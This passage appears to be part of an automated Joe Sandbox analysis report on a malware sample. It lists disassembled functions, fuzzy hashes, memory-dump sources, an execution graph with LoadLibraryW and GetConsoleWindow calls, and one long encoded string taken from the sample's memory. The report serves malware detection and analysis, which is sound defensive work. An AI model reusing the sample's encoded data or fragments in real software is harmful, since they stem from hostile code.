                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e0f9a2ba7a06ba58d0ec91cc4072aed13116e786ee31dcfcafb022e713f9a15f
                                                                                                                                                  • Instruction ID: 8f344520dfd6f388fefe177321dd62e2ccb070d47d8e43400aaefa1b725a0eae
                                                                                                                                                  • Opcode Fuzzy Hash: e0f9a2ba7a06ba58d0ec91cc4072aed13116e786ee31dcfcafb022e713f9a15f
                                                                                                                                                  • Instruction Fuzzy Hash: 2E212671504204EFDB25DF14E9C4B26BBE5FB88314F30C66DE8098B296C33ADC46CA61
                                                                                                                                                  Function 0072D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683835194.000000000072D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0072D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_72d000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a3b80e5158ce7b89a68bdc9a70b7697e502c3b15f3202d8b38b894f36e5f5f09
                                                                                                                                                  • Instruction ID: ef777cafa15af82a0e870b57dea0a74c12acba173cc27d49c43c80dc37cd3fb5
                                                                                                                                                  • Opcode Fuzzy Hash: a3b80e5158ce7b89a68bdc9a70b7697e502c3b15f3202d8b38b894f36e5f5f09
                                                                                                                                                  • Instruction Fuzzy Hash: 1021F271604244DFCB34DF14E9C4B26BBA5EB88314F20C56DD94A4B2A6C33ADC47CA61
                                                                                                                                                  Function 0071D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683672473.000000000071D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0071D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_71d000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                  • Instruction ID: 7129393e4649cd5520b5402dcdb5f1fef6cdb1467c4dc682091ae4229fe7efe4
                                                                                                                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                  • Instruction Fuzzy Hash: D911D376504280CFCB16CF14D5C4B56BF72FB94318F24C6A9D8490B656C33AD86ACFA1
                                                                                                                                                  Function 0072D017 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683835194.000000000072D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0072D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_72d000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                  • Instruction ID: d85bf6669164d17d41eda674479e24cbc614f89904776fb7274e0a15cfab8a26
                                                                                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                  • Instruction Fuzzy Hash: 0C119075504284DFDB25CF14E5C4B15FF61FB44314F24C6AAD8494B666C33AD84ACB61
                                                                                                                                                  Function 0072D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683835194.000000000072D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0072D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_72d000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                  • Instruction ID: 3df0696c305878a3e02a17c36189748810a1ed809ef90777385c0d35a136d830
                                                                                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                  • Instruction Fuzzy Hash: C7118B75504280DFDB16CF14D5C4B15BBA1FB84324F24C6AAD8498B696C33AD84ACB61
                                                                                                                                                  Function 0071D731 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683672473.000000000071D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0071D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_71d000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e28d2e9b27feb554c002839ac312f9bc12cfeecc3367aaa34b2e88bb3c061c15
                                                                                                                                                  • Instruction ID: 0372beadadaff06c0fe3af44d790552ce2e4b7c36ea5c642d12d4cb60d0b4907
                                                                                                                                                  • Opcode Fuzzy Hash: e28d2e9b27feb554c002839ac312f9bc12cfeecc3367aaa34b2e88bb3c061c15
                                                                                                                                                  • Instruction Fuzzy Hash: CE01A2710093449AE7209A2DCDC47A7FFA8EF41324F28C52AED094A2D6C67D9C80CAB1
                                                                                                                                                  Function 0071D730 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683672473.000000000071D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0071D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_71d000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d48a8ee3d6ba5c60e37583f42fb7e46120901dbd4fe815a3c91a3eb606238d44
                                                                                                                                                  • Instruction ID: ed7275f23081904e2cd2d8526c903e82669f8e2585ce88b6906b10103085bc0d
                                                                                                                                                  • Opcode Fuzzy Hash: d48a8ee3d6ba5c60e37583f42fb7e46120901dbd4fe815a3c91a3eb606238d44
                                                                                                                                                  • Instruction Fuzzy Hash: 2CF062724053449AE7208A1ADDC4BA6FFA8EF91734F18C55AED084F2D6C2799C84CA71

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 0698CAD8 Relevance: 7.3, Strings: 5, Instructions: 1028COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688296264.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6980000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4'^q$TJcq$Te^q$pbq$xbaq
                                                                                                                                                  • API String ID: 0-2576840827
                                                                                                                                                  • Opcode ID: 5e28cf7cca5151013e9c5fac5ae03478c5af4bf898cedd1b687287ddab94d127
                                                                                                                                                  • Instruction ID: 916dba91fff389f8bd985fdcdb0538be7cbc7814ba600ca7a92f8395a0e2874a
                                                                                                                                                  • Opcode Fuzzy Hash: 5e28cf7cca5151013e9c5fac5ae03478c5af4bf898cedd1b687287ddab94d127
                                                                                                                                                  • Instruction Fuzzy Hash: A7B2D474E00628DFDB54DF69C984AD9BBB2FF89300F1580E9E409AB265DB319E85CF40
                                                                                                                                                  Function 0698CAC7 Relevance: 4.0, Strings: 3, Instructions: 241COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688296264.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6980000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: TJcq$Te^q$xbaq
                                                                                                                                                  • API String ID: 0-3225726259
                                                                                                                                                  • Opcode ID: 8a47eef653b909c1848a872dad136478348eddadcc93ad4833b29bda5d8404b8
                                                                                                                                                  • Instruction ID: 531233c62ce6da53a131d2691f6112c8f5f73151c83b8a1fa2e664d56d66b8b7
                                                                                                                                                  • Opcode Fuzzy Hash: 8a47eef653b909c1848a872dad136478348eddadcc93ad4833b29bda5d8404b8
                                                                                                                                                  • Instruction Fuzzy Hash: BDC16275E006188FDB58DF6AC944ADDBBF2BF89300F14C1AAD809AB365DB305A85CF50
                                                                                                                                                  Function 069A9380 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: G4E
                                                                                                                                                  • API String ID: 0-1007730206
                                                                                                                                                  • Opcode ID: b20140b93bd196ffc3b4ad6b476d6096b40b26e2b67dd2f1c7a5dde99fcf3e75
                                                                                                                                                  • Instruction ID: defb2cd30d25b6c747a794b88025bd54977a3ca4cbe87e12d098152b102506bb
                                                                                                                                                  • Opcode Fuzzy Hash: b20140b93bd196ffc3b4ad6b476d6096b40b26e2b67dd2f1c7a5dde99fcf3e75
                                                                                                                                                  • Instruction Fuzzy Hash: F8E11BB4E102198FCB54DFA9D5809AEFBF2FF89305F248159E414AB756D730A942CFA0
                                                                                                                                                  Function 06980040 Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688296264.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6980000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Hbq
                                                                                                                                                  • API String ID: 0-1245868
                                                                                                                                                  • Opcode ID: 649df47f1b2b7b32109e94838bb01505deeb884d41b9c97b6ea5e5778d079d40
                                                                                                                                                  • Instruction ID: 0e94deb5ec8df6a5e4ac00e52c05eaaf652ba3fa5feee76f16a1c4faccf4dc22
                                                                                                                                                  • Opcode Fuzzy Hash: 649df47f1b2b7b32109e94838bb01505deeb884d41b9c97b6ea5e5778d079d40
                                                                                                                                                  • Instruction Fuzzy Hash: EAA13F70E00209DFDB44EFB8D5546AE7BF6FF88300F108569E449AB394DA39AD46CB51
                                                                                                                                                  Function 0698C830 Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688296264.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6980000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4'^q
                                                                                                                                                  • API String ID: 0-1614139903
                                                                                                                                                  • Opcode ID: 7f26627bcb9e576c4e0f6b4050cca63af84ab0db6288e1cada109fcc7acf42d3
                                                                                                                                                  • Instruction ID: 47c6cce375cde11bbed3c304e318d9e0bcebb7e47c37bc4b007dbcc2707b785b
                                                                                                                                                  • Opcode Fuzzy Hash: 7f26627bcb9e576c4e0f6b4050cca63af84ab0db6288e1cada109fcc7acf42d3
                                                                                                                                                  • Instruction Fuzzy Hash: B16124B0E002498FD748EF7AE945699BBF7FB88300F14C53AD0049B369DB78595ADB50
                                                                                                                                                  Function 0698C840 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688296264.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6980000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4'^q
                                                                                                                                                  • API String ID: 0-1614139903
                                                                                                                                                  • Opcode ID: 197975a5ce3020bf563ccb2d57fff1ba2479afb176a5174d2e90366585d5d9c4
                                                                                                                                                  • Instruction ID: 3aeb0214c82907e857453924751ec9893c98c840d80efcc848f82ce317591e2b
                                                                                                                                                  • Opcode Fuzzy Hash: 197975a5ce3020bf563ccb2d57fff1ba2479afb176a5174d2e90366585d5d9c4
                                                                                                                                                  • Instruction Fuzzy Hash: 8961F1B0E002088FD748EF7AE545699BBF7FB88300F14C52AD0049B369DB78595ADB50
                                                                                                                                                  Function 069AE0F0 Relevance: .4, Instructions: 379COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6eaa63103156293bf163ce03dff3cc378662686c68302ff6d588e23dd1b5ce58
                                                                                                                                                  • Instruction ID: 71ddc9d7826ea371e6b57d37e499d13bc1c8144a8db919d8a72a7fa658e3c241
                                                                                                                                                  • Opcode Fuzzy Hash: 6eaa63103156293bf163ce03dff3cc378662686c68302ff6d588e23dd1b5ce58
                                                                                                                                                  • Instruction Fuzzy Hash: 86D1BE31B003009FDB95DB75C9507AEB7FAAFC9300F24846DD05A9BA91DB34E905CB92
                                                                                                                                                  Function 069A8670 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 921df4d4bfaa68ec16eae55a1a898496f105b334054edd10e879a28e731a5a77
                                                                                                                                                  • Instruction ID: 3375f62924995d1afa9863c15f390da07caa453e1314675443c21b3fd603b5fa
                                                                                                                                                  • Opcode Fuzzy Hash: 921df4d4bfaa68ec16eae55a1a898496f105b334054edd10e879a28e731a5a77
                                                                                                                                                  • Instruction Fuzzy Hash: DBE1EA74E002198FCB54DFA9D5809AEFBF2FF89304F248559D414AB356DB30A942DFA1
                                                                                                                                                  Function 069A73D0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8423fb53be0236cf28d20585f4e0e8cb4385db310da942e4ed3fe6db6b29c814
                                                                                                                                                  • Instruction ID: 74ee640932776a8a811863f85813514e28ca7c667db0796c1557b4148da57320
                                                                                                                                                  • Opcode Fuzzy Hash: 8423fb53be0236cf28d20585f4e0e8cb4385db310da942e4ed3fe6db6b29c814
                                                                                                                                                  • Instruction Fuzzy Hash: 11E11AB4E002198FDB14DFA9D5819AEFBF2FF89304F248569D414AB356D730A942CFA1
                                                                                                                                                  Function 069A6F98 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 51a6b7aff9d85392889b5bbbf23330617b1278831506fdfba86cb1351e8468cc
                                                                                                                                                  • Instruction ID: 84ce8ea94153cad4d2a7b551015eaf9347b534971bc166809f3bf8f7d7826c99
                                                                                                                                                  • Opcode Fuzzy Hash: 51a6b7aff9d85392889b5bbbf23330617b1278831506fdfba86cb1351e8468cc
                                                                                                                                                  • Instruction Fuzzy Hash: 8DE10D74E002198FCB54DFA9D5819AEFBF2FF89304F248169E414AB756D731A942CFA0
                                                                                                                                                  Function 069A8F48 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bc877cb9e5b5c6a8d6866edcf23e8400ae052077d223993ba233ca5ad9f8f8cd
                                                                                                                                                  • Instruction ID: b834bafc1e73463a03983faae7c6422e0d3b743277715e6a5fd3fec706439801
                                                                                                                                                  • Opcode Fuzzy Hash: bc877cb9e5b5c6a8d6866edcf23e8400ae052077d223993ba233ca5ad9f8f8cd
                                                                                                                                                  • Instruction Fuzzy Hash: 9BE10B74E102198FCB14DFA9D5809AEFBF2FF89304F248169D414AB756D731A942CFA0
                                                                                                                                                  Function 00A7E094 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1684292540.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_a70000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 52e8b95e78ec4548113ca955eb2a3b24e59501acdb964cb87bd7fba1e2fe90a1
                                                                                                                                                  • Instruction ID: 9ee54ed39e0971e7dafa208257b747cf0b5e24fe326abe83ba842bd73ef28ada
                                                                                                                                                  • Opcode Fuzzy Hash: 52e8b95e78ec4548113ca955eb2a3b24e59501acdb964cb87bd7fba1e2fe90a1
                                                                                                                                                  • Instruction Fuzzy Hash: 31A17132E002198FCF09DFB4C94559EB7B2FF89304B25C5BAE909AB265DB31D955CB40
                                                                                                                                                  Function 069A6F5C Relevance: .2, Instructions: 160COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 38fffb36daefd2e1d44be15c423a1db851bfe68fc828f3abe6b1fddf66802e75
                                                                                                                                                  • Instruction ID: 278e3a9645e0745443b08d75414bf326185145522765d16a877d18a24c3dec31
                                                                                                                                                  • Opcode Fuzzy Hash: 38fffb36daefd2e1d44be15c423a1db851bfe68fc828f3abe6b1fddf66802e75
                                                                                                                                                  • Instruction Fuzzy Hash: 08516B74E042198FDB14CFA9D9815AEFBF2EF89300F24816AD418AB316DB315942CFA1
                                                                                                                                                  Function 069A8F38 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 189a4e3419d3550fd95bba10864bf79d4c2c5d67d109e6aa747bcdadb5257bf8
                                                                                                                                                  • Instruction ID: 3ba34fc70b84cfd0b6ff4cc1ca5ce5858a5d24be46eb5ef569e9592ae51e9495
                                                                                                                                                  • Opcode Fuzzy Hash: 189a4e3419d3550fd95bba10864bf79d4c2c5d67d109e6aa747bcdadb5257bf8
                                                                                                                                                  • Instruction Fuzzy Hash: E4510971E142198FDB14DFA9D9809AEFBF2FF89304F24816AD418A7316D7319942CFA1
                                                                                                                                                  Function 069A73C1 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c692f9f648c0fa9b75bcf79af8d9e6f014e07a80ea516a0f343a4ae3b748ceb2
                                                                                                                                                  • Instruction ID: e662085bf88465b93d3ec4bd0ecea66977bfbb6e7c0a8acb7014c797b4a81765
                                                                                                                                                  • Opcode Fuzzy Hash: c692f9f648c0fa9b75bcf79af8d9e6f014e07a80ea516a0f343a4ae3b748ceb2
                                                                                                                                                  • Instruction Fuzzy Hash: 6D512AB4E002198FDB14CFA9D5815AEFBF2FF89304F24856AD418AB356D7309942CFA1
                                                                                                                                                  Function 069AAF5D Relevance: .0, Instructions: 24COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 07148f89d03ac157473f16774383ce9c85ae5c0b1454e589f94927f5fb96f664
                                                                                                                                                  • Instruction ID: e0437e41053b5779e3b93e5b9649d46794a9fe0d67d458ee631a14216b25725d
                                                                                                                                                  • Opcode Fuzzy Hash: 07148f89d03ac157473f16774383ce9c85ae5c0b1454e589f94927f5fb96f664
                                                                                                                                                  • Instruction Fuzzy Hash: 8EE04F38D0A208CFD740CF94E1445F8BBF8EB9A321F003851E10E93605DA306D90CEC0

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:13.1%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                  Total number of Nodes:30
                                                                                                                                                  Total number of Limit Nodes:1
                                                                                                                                                  execution_graph 28550 6b16361 28551 6b162fc 28550->28551 28552 6b1636a 28550->28552 28556 6b17400 28551->28556 28560 6b173ff 28551->28560 28553 6b1631d 28558 6b17448 28556->28558 28557 6b17451 28557->28553 28558->28557 28564 6b17148 28558->28564 28561 6b17400 28560->28561 28562 6b17451 28561->28562 28563 6b17148 LoadLibraryW 28561->28563 28562->28553 28563->28562 28565 6b175f0 LoadLibraryW 28564->28565 28567 6b17665 28565->28567 28567->28557 28568 1880871 28572 18808c8 28568->28572 28577 18808d8 28568->28577 28569 1880889 28573 18808fa 28572->28573 28582 1880ce0 28573->28582 28586 1880ce8 28573->28586 28574 188093e 28574->28569 28578 18808fa 28577->28578 28580 1880ce8 GetConsoleWindow 28578->28580 28581 1880ce0 GetConsoleWindow 28578->28581 28579 188093e 28579->28569 28580->28579 28581->28579 28583 1880d26 GetConsoleWindow 28582->28583 28585 1880d56 28583->28585 28585->28574 28587 1880d26 GetConsoleWindow 28586->28587 28589 1880d56 28587->28589 28589->28574

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 06B6152F Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • mL8IZEcCYFIfAPyTP/mT7L/8l/+SPfKRj8ze9a53zYy98Y1vjGOf/exn4xjDsd7HteUAqC8BKVDM4d0ycqjXp+38HYAprLk5daXXxj77QJ47t8yAeg2lAJhmoW6VGeRrSnFuniLCFfvpm4NTrFtFDv365FCvTwqAK0VAh3p9AuaZHPppDv20cQJ+yKJdTe56zV2zCACOPhKul+peAlLCnTmHFPe6lMIcm3wo3C9sS8Qj1NWAXhq/w68ui33S+P15wDyN, xrefs: 06B61531
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1877531169.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_6b60000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: mL8IZEcCYFIfAPyTP/mT7L/8l/+SPfKRj8ze9a53zYy98Y1vjGOf/exn4xjDsd7HteUAqC8BKVDM4d0ycqjXp+38HYAprLk5daXXxj77QJ47t8yAeg2lAJhmoW6VGeRrSnFuniLCFfvpm4NTrFtFDv365FCvTwqAK0VAh3p9AuaZHPppDv20cQJ+yKJdTe56zV2zCACOPhKul+peAlLCnTmHFPe6lMIcm3wo3C9sS8Qj1NWAXhq/w68ui33S+P15wDyN
                                                                                                                                                  • API String ID: 0-58496567
                                                                                                                                                  • Opcode ID: ae43bde0c23f65d751fda8d02b84dfb748076424c855c17dc17c7d9909e8a5da
                                                                                                                                                  • Instruction ID: 03cde4ecaa3ddfac66fc7d1e4e767ede76c10c9566050f8395954c6e2fb24432
                                                                                                                                                  • Opcode Fuzzy Hash: ae43bde0c23f65d751fda8d02b84dfb748076424c855c17dc17c7d9909e8a5da
                                                                                                                                                  • Instruction Fuzzy Hash: 1FC15A39B41104AFCB44CF59C888E9DBBB2FF89704B608099FA029F366C772EC158B55
                                                                                                                                                  Function 06B17148 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,06B174A6), ref: 06B17656
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.1877444107.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_2_2_6b10000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1029625771-0
